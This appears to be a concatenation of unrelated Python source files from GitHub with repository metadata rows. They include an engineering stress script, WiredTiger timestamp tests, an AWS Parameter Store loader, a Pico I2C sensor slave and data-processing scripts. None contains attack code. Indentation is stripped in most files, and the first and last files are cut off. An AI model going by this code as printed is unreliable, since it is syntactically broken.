def moment_stress(n):
A = deflection(n)
b = rhs(n)
x = solve(A,b)
h = Lx/n
#M_0 = E*Izz/(h**2)*(x[1]-2*x[0])
M_1 = E*Izz/(h**2)*(x[1] - 2*x[0])
#M = array([M_0])
#M = hstack((M, [M_1]))
M = array([M_1])
#Stress
#sigma_0 = M_0*ymax/Izz*10**-6
sigma_1 = M_1*ymax/Izz*10**-6
#sigma = array([sigma_0])
#sigma = hstack((sigma, sigma_1))
sigma = array([sigma_1])
#print(M)
for i in range(1,n-1):
M_i = E*Izz/(h**2)*(x[[i+1]]- 2*x[i] + x[i-1])
sigma_i = M_i*ymax/Izz*10**-6
#print(M_i)
M = hstack((M, M_i))
sigma = hstack((sigma, sigma_i))
#load = vstack((load, [[q_i]]))
M = hstack((M, [0]))
sigma = hstack((sigma, [0]))
position = []
for j in range(1, n+1):
position.append(j*Lx/n)
print(max(sigma))
#print(sigma[1])
print(len(position))
print(len(M))
Izz_new = max(M)*ymax*FOS/(S*10**6)*10**5
    print("Required Izz:", Izz_new)
plt.plot(position, M)
plt.title('Bending moment vs. length')
plt.xlabel('x (m)')
plt.ylabel('Bending moment (Nm)')
plt.show()
plt.plot(position, sigma)
plt.title('Bending stress vs. length')
plt.xlabel('x (m)')
plt.ylabel('Bending stress (MPa)')
plt.show()
#print(M)
return
moment_stress(17)
#print('RHS: ',rhs(7))
#print('RHS 1: "',rhs_1(7))
#print(rhs(7))
"""
#First line of matrix
import time
A = deflection(n)
b = rhs(n)
##################Computation time using optimised solver######################
start_op = time.time()
deflect_op = solve(A, b)
end_op = time.time()
compute_time_op = end_op - start_op
print("Computation time using optimised solver:", compute_time_op)
###############Computation time using numpy in-built solver#####################
start = time.time()
deflect = np.linalg.solve(A, b)
end = time.time()
compute_time = end - start
print("Computation time using numpy in-built solver:", compute_time)
###############Computation time using Gauss-Jordan solver#######################
start_g = time.time()
deflect_g = solve(A, b)
end_g = time.time()
compute_time_g = end_g - start_g
print("Computation time using Gauss-Jordan solver:", compute_time_g)
print("Does the solver work? \n", check(deflect_op, deflect))
"""
| oncernhan/MECH2700 | assignment2.py | assignment2.py | py | 8,879 | python | en | code | 0 | github-code | 36 |
36956060159 | from suite_subprocess import suite_subprocess
import wiredtiger, wttest
from wtscenario import make_scenarios
class test_timestamp14(wttest.WiredTigerTestCase, suite_subprocess):
tablename = 'test_timestamp14'
uri = 'table:' + tablename
format_values = [
('integer-row', dict(key_format='i', value_format='i')),
('column', dict(key_format='r', value_format='i')),
('column-fix', dict(key_format='r', value_format='8t')),
]
scenarios = make_scenarios(format_values)
def test_all_durable_old(self):
# This test was originally for testing the all_committed timestamp.
# In the absence of prepared transactions, all_durable is identical to
# all_committed so let's enforce the all_durable values instead.
all_durable_uri = self.uri + '_all_durable'
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1 = self.setUpSessionOpen(self.conn)
session2 = self.setUpSessionOpen(self.conn)
session1.create(all_durable_uri, format)
session2.create(all_durable_uri, format)
        # Scenario 0: No commit timestamp has ever been specified, therefore
        # there is no all_durable timestamp and we will get an error
        # querying for it.
session1.begin_transaction()
cur1 = session1.open_cursor(all_durable_uri)
cur1[1]=1
session1.commit_transaction()
self.assertEquals(self.conn.query_timestamp('get=all_durable'), "0")
# Scenario 1: A single transaction with a commit timestamp, will
# result in the all_durable timestamp being set.
session1.begin_transaction()
cur1[1]=1
session1.commit_transaction('commit_timestamp=1')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "1")
# Scenario 2: A transaction begins and specifies that it intends
# to commit at timestamp 2, a second transaction begins and commits
# at timestamp 3.
session1.begin_transaction()
session1.timestamp_transaction('commit_timestamp=2')
session2.begin_transaction()
cur2 = session2.open_cursor(all_durable_uri)
cur2[2] = 2
session2.commit_transaction('commit_timestamp=3')
# As the original transaction is still running the all_durable
# timestamp is being held at 1.
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "1")
cur1[1] = 2
session1.commit_transaction()
# Now that the original transaction has finished the all_durable
# timestamp has moved to 3, skipping 2 as there is a commit with
# a greater timestamp already existing.
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "3")
# Scenario 3: Commit with a commit timestamp of 5 and then begin a
# transaction intending to commit at 4, the all_durable timestamp
# should move back to 3. Until the transaction at 4 completes.
session1.begin_transaction()
cur1[1] = 3
session1.commit_transaction('commit_timestamp=5')
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "5")
session1.begin_transaction()
# All durable will now move back to 3 as it is the point at which
# all transactions up to that point have committed.
session1.timestamp_transaction('commit_timestamp=4')
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "3")
session1.commit_transaction()
# Now that the transaction at timestamp 4 has completed the
# all durable timestamp is back at 5.
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "5")
        # Scenario 4: Holding a transaction open without a commit timestamp
        # will not affect the all_durable timestamp.
session1.begin_transaction('no_timestamp=true')
session2.begin_transaction()
cur2[2] = 2
session2.commit_transaction('commit_timestamp=6')
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "6")
cur1[1] = 2
session1.commit_transaction()
def test_oldest_reader(self):
oldest_reader_uri = self.uri + '_oldest_reader_pinned'
session1 = self.setUpSessionOpen(self.conn)
session2 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(oldest_reader_uri, format)
session2.create(oldest_reader_uri, format)
# Nothing is reading so there is no oldest reader.
self.assertEquals(self.conn.query_timestamp('get=oldest_reader'), "0")
# Write some data for reading.
session1.begin_transaction()
cur1 = session1.open_cursor(oldest_reader_uri)
cur1[1]=1
session1.commit_transaction('commit_timestamp=5')
# No active sessions so no oldest reader.
self.assertEquals(self.conn.query_timestamp('get=oldest_reader'), "0")
# Create an active read session.
session1.begin_transaction('read_timestamp=5')
# Oldest reader should now exist and be equal to our read timestamp.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '5')
# Start transaction without read timestamp specified
# Should not affect the current oldest reader.
session2.begin_transaction()
cur2 = session2.open_cursor(oldest_reader_uri)
cur2[2] = 2
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '5')
session2.commit_transaction('commit_timestamp=7')
# Open read transaction with newer read timestamp, oldest
# Reader should therefore be unchanged.
session2.begin_transaction('read_timestamp=7')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '5')
# End current oldest reader transaction, it will have now moved
# up to our transaction created before.
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '7')
session2.commit_transaction()
# Now that all read transactions have completed we will be back
# to having no oldest reader.
self.assertEquals(self.conn.query_timestamp('get=oldest_reader'), "0")
def test_pinned_oldest(self):
pinned_oldest_uri = self.uri + 'pinned_oldest'
session1 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(pinned_oldest_uri, format)
# Confirm no oldest timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=oldest_timestamp'), "0")
# Confirm no pinned timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=pinned'), "0")
# Write some data for reading.
session1.begin_transaction()
cur1 = session1.open_cursor(pinned_oldest_uri)
cur1[1]=1
session1.commit_transaction('commit_timestamp=5')
# Confirm no oldest timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=oldest_timestamp'), "0")
# Confirm no pinned timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=pinned'), "0")
self.conn.set_timestamp('oldest_timestamp=5')
# Pinned timestamp should now match oldest timestamp
self.assertTimestampsEqual(self.conn.query_timestamp('get=pinned'), '5')
# Write some more data for reading.
session1.begin_transaction()
cur1[2]=2
session1.commit_transaction('commit_timestamp=8')
# Create an active read session.
session1.begin_transaction('read_timestamp=5')
# Move oldest timestamp past active read session.
self.conn.set_timestamp('oldest_timestamp=8')
# Pinned timestamp should now reflect oldest reader.
self.assertTimestampsEqual(self.conn.query_timestamp('get=pinned'), '5')
# End active read session.
session1.commit_transaction()
# Pinned timestamp should now match oldest timestamp.
self.assertTimestampsEqual(self.conn.query_timestamp('get=pinned'), '8')
def test_all_durable(self):
all_durable_uri = self.uri + '_all_durable'
session1 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(all_durable_uri, format)
# Since this is a non-prepared transaction, we'll be using the commit
# timestamp when calculating all_durable since it's implied that they're
# the same thing.
session1.begin_transaction()
cur1 = session1.open_cursor(all_durable_uri)
cur1[1] = 1
session1.commit_transaction('commit_timestamp=3')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '3')
# We have a running transaction with a lower commit_timestamp than we've
# seen before. So all_durable should return (lowest commit timestamp - 1).
session1.begin_transaction()
cur1[2] = 2
session1.timestamp_transaction('commit_timestamp=2')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '1')
session1.commit_transaction()
# After committing, go back to the value we saw previously.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '3')
# For prepared transactions, we take into account the durable timestamp
# when calculating all_durable.
session1.begin_transaction()
cur1[3] = 3
session1.prepare_transaction('prepare_timestamp=6')
# If we have a commit timestamp for a prepared transaction, then we
# don't want that to be visible in the all_durable calculation.
session1.timestamp_transaction('commit_timestamp=7')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '3')
# Now take into account the durable timestamp.
session1.timestamp_transaction('durable_timestamp=8')
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
# All durable moves back when we have a running prepared transaction
# with a lower durable timestamp than has previously been committed.
session1.begin_transaction()
cur1[4] = 4
session1.prepare_transaction('prepare_timestamp=3')
# If we have a commit timestamp for a prepared transaction, then we
# don't want that to be visible in the all_durable calculation.
session1.timestamp_transaction('commit_timestamp=4')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
# Now take into account the durable timestamp.
session1.timestamp_transaction('durable_timestamp=5')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '4')
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
# Now test a scenario with multiple commit timestamps for a single txn.
session1.begin_transaction()
cur1[5] = 5
session1.timestamp_transaction('commit_timestamp=6')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '5')
# Make more changes and set a new commit timestamp.
# Our calculation should use the first commit timestamp so there should
# be no observable difference to the all_durable value.
cur1[6] = 6
session1.timestamp_transaction('commit_timestamp=7')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '5')
# Once committed, we go back to 8.
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
def test_all(self):
all_uri = self.uri + 'pinned_oldest'
session1 = self.setUpSessionOpen(self.conn)
session2 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(all_uri, format)
session2.create(all_uri, format)
cur1 = session1.open_cursor(all_uri)
cur2 = session2.open_cursor(all_uri)
# Set up oldest timestamp.
self.conn.set_timestamp('oldest_timestamp=1')
# Write some data for reading.
session1.begin_transaction()
cur1[1]=1
session1.commit_transaction('commit_timestamp=2')
session1.begin_transaction()
cur1[2]=2
session1.commit_transaction('commit_timestamp=4')
# Confirm all_durable is now 4.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "4")
# Create a read session.
session1.begin_transaction('read_timestamp=2')
# Confirm oldest reader is 2 and the value we read is 1.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), "2")
self.assertEqual(cur1[1], 1)
# Commit some data at timestamp 7.
session2.begin_transaction()
cur2[3] = 2
session2.commit_transaction('commit_timestamp=7')
# All_durable should now be 7.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "7")
# Move oldest to 5.
self.conn.set_timestamp('oldest_timestamp=5')
# Confirm pinned timestamp is pointing at oldest_reader.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=pinned'),
self.conn.query_timestamp('get=oldest_reader'))
# Begin a write transaction pointing at timestamp 6,
# this is below our current all_durable so it should move back
# to the oldest timestamp.
session2.begin_transaction()
session2.timestamp_transaction('commit_timestamp=6')
cur2[4] = 3
# Confirm all_durable is now equal to oldest.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'),
self.conn.query_timestamp('get=oldest_timestamp'))
session2.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "7")
# End our read transaction.
session1.commit_transaction()
# Pinned will now match oldest.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=pinned'),
self.conn.query_timestamp('get=oldest_timestamp'))
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_timestamp14.py | test_timestamp14.py | py | 15,173 | python | en | code | 24,670 | github-code | 36 |
20053108840 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 10 20:38:02 2018
@author: tf
"""
import AdaBoost
import numpy as np
#dataMat, labelMat = AdaBoost.loadDataSet()
#print(dataMat, '\n', labelMat)
#D = np.ones((5, 1)) / 5
#bestStump, minErr, bestClassEst = AdaBoost.buildStump(dataMat, labelMat, D)
#print(bestStump, '\n', minErr, '\n', bestClassEst)
#classifierArr = AdaBoost.adaBoostTrainDS(dataMat, labelMat)
#print(classifierArr)
#print(max(0.1,0.2))
#clas = AdaBoost.adaClassify(np.array([[5, 5], [0, 0]]), classifierArr)
#print(clas)
dataMat, labelMat = AdaBoost.loadFileDataSet('horseColicTraining2.txt')
classifierArr = AdaBoost.adaBoostTrainDS(dataMat, labelMat)
#print(classifierArr)
testDataMat, testLabelMat = AdaBoost.loadFileDataSet('horseColicTest2.txt')
errRate = AdaBoost.adaClassify(testDataMat, classifierArr, testLabelMat)
print(errRate) | Cjh327/Machine-Learning-in-Action | AdaBoost/AdaBoost_test.py | AdaBoost_test.py | py | 859 | python | en | code | 2 | github-code | 36 |
26667888776 | import codecs
import random
def read_proxy():
proxy_list = []
with codecs.open("proxy_pool.txt", "r") as f:
for line in f.readlines():
proxy_list.append(line.strip('\n'))
proxy = random.choice(proxy_list)
return proxy
| nado-dev/Spider_bilibili | proxy_setting.py | proxy_setting.py | py | 256 | python | en | code | 0 | github-code | 36 |
25718423751 | from roleidentification import pull_data, get_roles
def main():
print("Pulling data...")
champion_roles = pull_data()
print("Finished pulling data.")
print()
champions = [122, 64, 69, 119, 201] # ['Darius', 'Lee Sin', 'Cassiopeia', 'Draven', 'Braum']
roles = get_roles(champion_roles, champions)
print(roles)
if __name__ == "__main__":
main()
| meraki-analytics/role-identification | examples/get_roles.py | get_roles.py | py | 381 | python | en | code | 26 | github-code | 36 |
19293482431 | """Parameter Store Loader
Use (setting_name, cast function) or setting_name as lookup value.
If no cast function is passed, the parameter will be stored as retrieved
from Parameter Store, typically string or stringList.
Usage:
from awstanding.parameter_store import load_parameters
LOOKUP_DICT = {
'/my/parameter/path': 'NEW_VARIABLE'
}
load_parameters(LOOKUP_DICT)
# Now NEW_VARIABLE can be obtained from environment variables.
"""
import os
from typing import Union, Iterable
import boto3
from boto3.exceptions import Boto3Error
from botocore.exceptions import BotoCoreError, ClientError
from .exceptions import ParameterNotFoundException
_ssm_client = boto3.client(service_name='ssm')
def load_parameters(lookup_dict: dict, allow_invalid=True) -> dict:
"""
Loads each parameter defined in the lookup_dict as env. variables.
The lookup_dict should look like this:
{
'/path/to/parameter1': 'PARAMETER_AS_ENV_VAR_1',
'/path/to/parameter2': 'PARAMETER_AS_ENV_VAR_2',
...
'/path/to/parameterN': 'PARAMETER_AS_ENV_VAR_N',
}
The values (Env. variables names) could be anything you want.
It returns the loaded parameters for debugging purposes
"""
paginated_keys = (list(lookup_dict.keys())[i:i+10] for i in range(0, len(lookup_dict), 10))
parameters_ps = []
invalid_parameters = []
for keys in paginated_keys:
parameters_page = _ssm_client.get_parameters(Names=keys, WithDecryption=True)
parameters_ps += parameters_page['Parameters']
invalid_parameters += parameters_page['InvalidParameters']
if invalid_parameters and not allow_invalid:
raise ParameterNotFoundException(invalid_parameters)
parameters_ps = {param['Name']: param['Value'] for param in parameters_ps}
# Override configuration for requested keys
for key in parameters_ps:
if isinstance(lookup_dict[key], (tuple, list)):
setting_name, cast = lookup_dict[key]
os.environ[setting_name] = cast(parameters_ps[key])
elif isinstance(lookup_dict[key], str):
os.environ[lookup_dict[key]] = parameters_ps[key]
return parameters_ps
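# Example sketch (hypothetical parameter paths): a (env_var_name, cast) tuple applies
# the cast to the raw Parameter Store string before it is written to os.environ, so
# the cast should return a str.
#
#   load_parameters({
#       '/my/app/db-url': 'DATABASE_URL',
#       '/my/app/region': ('AWS_REGION_NAME', str.strip),
#   })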
def load_path(*paths: Union[Iterable[str], str]) -> dict:
"""
Loads each parameter behind `paths` recursively as env. variables.
It returns the loaded parameters for debugging purposes
"""
all_parameters = {}
for path in paths:
parameters_page = _ssm_client.get_parameters_by_path(Path=path, Recursive=True)
parameters_ps = parameters_page['Parameters']
while parameters_page.get('NextToken'):
parameters_page = _ssm_client.get_parameters_by_path(Path=path, Recursive=True, NextToken=parameters_page.get('NextToken'))
parameters_ps += parameters_page['Parameters']
parameters_ps = {param['Name']: param['Value'] for param in parameters_ps}
all_parameters.update(**parameters_ps)
# Override configuration for requested keys
for key in parameters_ps:
os.environ[key.strip('/')
.replace('/', '_')
.replace('-', '_')
.upper()
] = parameters_ps[key]
return all_parameters
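# Example sketch (hypothetical path): after load_path('/my-app'), a parameter stored
# at '/my-app/db/host' is exported as the environment variable MY_APP_DB_HOST,
# since '/' and '-' are replaced with '_' and the name is upper-cased.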
class DynamicParameter(object):
@property
def _value(self):
try:
parameter_page = _ssm_client.get_parameter(Name=self.key, WithDecryption=True)
except (ClientError, Boto3Error, BotoCoreError):
if self.fail_on_boto_error:
raise
else:
return ''
else:
return parameter_page['Parameter']['Value']
def __init__(self, key, fail_on_boto_error=True, *args, **kwargs):
super().__init__()
self.key = key
self.fail_on_boto_error = fail_on_boto_error
def __eq__(self, other):
return self._value == other
    def __len__(self):
return len(self._value)
def __add__(self, other):
return self._value + other
def __radd__(self, other):
return other + self._value
def __unicode__(self):
return str(self._value)
def __str__(self):
return str.__str__(self._value)
def __repr__(self):
return str.__repr__(self._value)
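# Example sketch (hypothetical key): unlike load_parameters, a DynamicParameter is
# never cached; each comparison or concatenation triggers a fresh get_parameter call.
#
#   MAINTENANCE_MODE = DynamicParameter('/my/app/maintenance', fail_on_boto_error=False)
#   if MAINTENANCE_MODE == 'on':                      # __eq__ fetches the current value
#       print('Service ' + MAINTENANCE_MODE)          # __radd__ fetches it again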
| jiss2891/awstanding | src/awstanding/parameter_store.py | parameter_store.py | py | 4,272 | python | en | code | 13 | github-code | 36 |
9135179001 | from TWITOFF.twitter import *
DB.drop_all()
DB.create_all()
twitter_user = TWITTER.get_user('elonmusk')
tweets = twitter_user.timeline(count=200, exclude_replies=True, include_rts=False, tweet_mode='extended')
db_user = User(id=twitter_user.id, name=twitter_user.screen_name, newest_tweet_id=tweets[0].id)
for tweet in tweets:
embedding = BASILICA.embed_sentence(tweet.full_text,model='twitter')
db_tweet = Tweet(id=tweet.id, text=tweet.full_text[:500], embedding=embedding)
DB.session.add(db_tweet)
db_user.tweets.append(db_tweet)
DB.session.add(db_user)
DB.session.commit()
| Tclack88/Lambda | DS-3-3-Productization-and-Cloud/module2-consuming-data-from-an-api/add_musk.py | add_musk.py | py | 599 | python | en | code | 0 | github-code | 36 |
75312916265 | """
Usage:
trajectory.py <path> <start_time> <resolution> <x0> <y0> <z0> <t0> [<output_path>]
trajectory.py (-h | --help)
Arguments:
<path>
<start_time>
<resolution>
Options:
-h --help
Show this screen.
"""
import datetime
import warnings
import numpy as np
from twinotter.util.scripting import parse_docopt_arguments
from pylagranto import caltra
from pylagranto.datasets import MetUMStaggeredGrid
from moisture_tracers import grey_zone_forecast
trajectory_filename = "{start_time}_{resolution}_{x0}E_{y0}N_{z0}{units}_" \
"T+{lead_time:02d}.pkl"
# Inner-domain centre: x0=302.5, y0=13.5, t0=48
# HALO: x0=302.283, y0=13.3
# Ron Brown (2nd Feb): x0=305.5, y0=13.9
# 24th Jan Case study:
# x0=302.5, y0=11.75, t0=T+24h
# x0=310.0, y0=15.0, t0=T+48h
def _command_line_interface(path, start_time, resolution, x0, y0, z0, t0, output_path="./"):
forecast = grey_zone_forecast(
path, start_time, resolution=resolution, grid=None, lead_times=range(1, 48 + 1)
)
traout = calculate_trajectory(
forecast, float(x0), float(y0), float(z0), int(t0), "height_above_reference_ellipsoid"
)
traout.save(
output_path + trajectory_filename.format(
start_time=forecast.start_time.strftime("%Y%m%d"),
resolution=resolution,
x0=format_float_for_file(x0),
y0=format_float_for_file(y0),
z0=format_float_for_file(z0),
            lead_time=int(t0),  # the filename template expects the key 'lead_time'
units="m",
)
)
def calculate_trajectory(forecast, x0, y0, z0, t0, zcoord):
levels = (zcoord, [z0])
trainp = np.array([[x0, y0, z0]])
times = list(forecast._loader.files)
datasource = MetUMStaggeredGrid(forecast._loader.files, levels=levels)
time_traj = forecast.start_time + datetime.timedelta(hours=t0)
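    # Integrate forward in time, backward in time, or both ways (joining the halves),
    # depending on whether the trajectory start time sits at the beginning, the end,
    # or somewhere in the middle of the forecast window.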
if time_traj == times[0]:
traout = caltra.caltra(
trainp, times, datasource, tracers=["x_wind", "y_wind"]
)
elif time_traj == times[-1]:
traout = caltra.caltra(
trainp, times, datasource, fbflag=-1, tracers=["x_wind", "y_wind"]
)
else:
times_fwd = [time for time in times if time <= time_traj]
traout_fwd = caltra.caltra(
trainp, times_fwd, datasource, tracers=["x_wind", "y_wind"]
)
times_bck = [time for time in times if time >= time_traj]
traout_bck = caltra.caltra(
trainp, times_bck, datasource, fbflag=-1, tracers=["x_wind", "y_wind"]
)
traout = traout_bck + traout_fwd
return traout
def format_float_for_file(x):
# Replace decimal point with a p (copying what was done for the UM files)
return str(x).replace(".", "p")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
parse_docopt_arguments(_command_line_interface, __doc__)
| leosaffin/moisture_tracers | moisture_tracers/trajectory.py | trajectory.py | py | 2,859 | python | en | code | 0 | github-code | 36 |
70141671463 | def read_file(filename):
    # Read one word per line and return the stripped words as a set.
    with open(filename) as file:
        return {word.strip() for word in file}
WORDBANK = read_file("wordbank.txt")
PREV_ANSWERS = read_file("prev_answers.txt")
POSS_ANSWERS = read_file("poss_answers.txt") | cezar-r/wordle_bot | src/words.py | words.py | py | 273 | python | en | code | 0 | github-code | 36 |
36386993279 | #!/usr/bin/env python3
from ietf.sql.rfc import Rfc
def query_rfc_by_keyword(Session, search_terms):
"""Return a query that, if run, would return RFCs with the keywords in
`keywords`.
The matching on is case-insensitive.
"""
# Assemble a query for each name
queries = [] # Empty list to store queries
for term in search_terms:
term = term.lower() # Convert to lowercase
queries.append(Session.query(Rfc).filter(Rfc.keywords.any(word=term)))
# Build a query of intersections
query_to_run = queries[0] # Assign first query
for query in queries[1:]: # Start at second element in list
query_to_run = query_to_run.intersect(query)
# Return the built query
return query_to_run
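# Example sketch (assumes a configured SQLAlchemy session factory named `Session`):
#   rfcs = query_rfc_by_keyword(Session, ['IPv6', 'Routing']).all()
# Each term is lower-cased and matched against the RFC keyword list, and the per-term
# queries are intersected, so only RFCs tagged with every term are returned.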
| lafrenierejm/ietf-cli | ietf/utility/query_keyword.py | query_keyword.py | py | 750 | python | en | code | 0 | github-code | 36 |
24788697819 | """
There are several baby sharks in an N×M grid. The grid is divided into 1×1 square cells, and each cell holds at most one baby shark.
The safety distance of a cell is the distance from that cell to the nearest baby shark. The distance between two cells is the number of cells that must be crossed to move from one cell to the other, and movement is allowed in the 8 adjacent directions (including diagonals).
Find the cell with the largest safety distance.
"""
import sys
from collections import deque
N, M = list(map(int, sys.stdin.readline().strip().split()))
blocks = [[0] * M for _ in range(N)] # blocks
dir = [(0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1)]
for i in range(N):
blocks[i] = list(map(int, sys.stdin.readline().strip().split()))
def out_of_range(y,x):
return y < 0 or x < 0 or y >= N or x >= M
def solve():
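    # For each empty cell, run a BFS over the 8-connected grid until the nearest
    # shark (a cell containing 1) is reached; the answer is the largest such distance.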
max_val = float("-inf")
for i in range(N):
for j in range(M):
if blocks[i][j] == 0:
                # start a BFS from this empty cell
q = deque()
visited = set()
q.append((i,j, 0))
visited.add((i,j))
dist = 0
while q:
row, col, distance = q.popleft()
# print(row, col, distance)
if blocks[row][col] == 1:
dist = distance
break
for idx in range(8):
next_r, next_c = row + dir[idx][0], col + dir[idx][1]
if out_of_range(next_r, next_c) or (next_r, next_c) in visited:# or (next_r, next_c) in did_shark_test:
continue
q.append((next_r, next_c, distance + 1))
visited.add((next_r,next_c))
max_val = max(max_val, dist)
return max_val
def main():
print(solve())
main() | inhyeokJeon/AALGGO | Python/baekjoon/17086_baby_shark_2.py | 17086_baby_shark_2.py | py | 1,975 | python | ko | code | 0 | github-code | 36 |
25946901690 | #=======================================================
# lm35_slave.py : ADRS2040U PICO HAT Test Program
# 2022.09.14 V0.0 New Create
# 2022.10.26 V1.0 for ADRS2040U Ver 1.0
#=======================================================
import utime
import time
from machine import mem32, Pin, ADC
from i2cSlave import i2c_slave
unit = 0.005035477
# led pin config
led = Pin(25, Pin.OUT)  # configure GP25 as an output
# led off
led.value(0)
# ADC on
lm35 = ADC(0)  # LM35 temperature sensor connected to ADC0
# i2c as slave
rp_i2c = i2c_slave(0, sda = 0, scl = 1, slaveAddress = 0x41)
rp_i2c.putWord(0) # dummy write for bus lock
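# Command protocol handled by the loop below: 0x10 -> reply with the raw 16-bit ADC
# reading of the LM35, 0x20 -> read one word from the master and set the LED
# (0 = off, 1 = on).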
while True:
cmd = 0
val = 0
temp = lm35.read_u16() # read ADC
if rp_i2c.any():
cmd = rp_i2c.get()
if cmd == 0x10 :
while not rp_i2c.anyRead():
pass
rp_i2c.putWord(temp)
#print('Temp:', temp * unit)
elif cmd == 0x20 :
val = rp_i2c.getWord()
#print('val :', val)
if val == 0 :
led.value(0)
elif val == 1 :
led.value(1)
| bit-trade-one/ADRS2040U | Sample/ADRS2040U_SampleSource/main.py | main.py | py | 1,189 | python | en | code | 1 | github-code | 36 |
75263426665 | """
@Time : 30/03/2023
@Author : qinghua
@Software: PyCharm
@File : process_data.py
"""
import os.path
import pickle
import lgsvl
import pandas as pd
import json
from config import Config
from tqdm import tqdm
"""Processing deep scenario data"""
def get_ds_data(runner):
"""pair paths of scenarios and scenario attributes"""
scene_attr_path_pairs = []
for root, dirs, files in os.walk(Config.scenario_dir):
depth = root.count(os.path.sep)
if depth == 4:
scenario_dirs = sorted([os.path.join(root, name) for name in os.listdir(root) if not name.endswith(".csv")])
attribute_fnames = sorted([os.path.join(root, name) for name in os.listdir(root) if name.endswith(".csv")])
scene_attr_path_pairs += list(zip(scenario_dirs, attribute_fnames))
"""
pair contents of scenarios and scenario attributes by each run
Output Example:
[
# run 0
[
# timestep 0
(
# variables
[1.2,2.1,...]
# attribute
{"ttc":xxx,"tto":xxx}
)
# timestep 1
....
]
# run 1
....
]
"""
print(scene_attr_path_pairs)
greedy_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"greedy-strategy" in scene_dir]
random_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"random-strategy" in scene_dir]
rl_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"rl_based-strategy" in scene_dir]
dto_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"reward-dto" in scene_dir]
jerk_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"reward-jerk" in scene_dir]
ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"reward-ttc" in scene_dir]
greedy_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"greedy-strategy" in scene_dir and "reward-ttc" in scene_dir]
random_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"random-strategy" in scene_dir and "reward-ttc" in scene_dir]
rl_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"rl_based-strategy" in scene_dir and "reward-ttc" in scene_dir]
r1_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road1" in scene_dir and "reward-ttc" in scene_dir]
r2_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road2" in scene_dir and "reward-ttc" in scene_dir]
r3_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road3" in scene_dir and "reward-ttc" in scene_dir]
r4_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road4" in scene_dir and "reward-ttc" in scene_dir]
all_runs = get_all_runs(scene_attr_path_pairs)
greedy_runs = get_all_runs(greedy_pairs)
random_runs = get_all_runs(random_pairs)
rl_runs = get_all_runs(rl_pairs)
dto_runs = get_all_runs(dto_pairs)
jerk_runs = get_all_runs(jerk_pairs)
ttc_runs = get_all_runs(ttc_pairs)
greedy_ttc_runs = get_all_runs(greedy_ttc_pairs)
random_ttc_runs = get_all_runs(random_ttc_pairs)
rl_ttc_runs = get_all_runs(rl_ttc_pairs)
r1_ttc_runs = get_all_runs(r1_ttc_pairs)
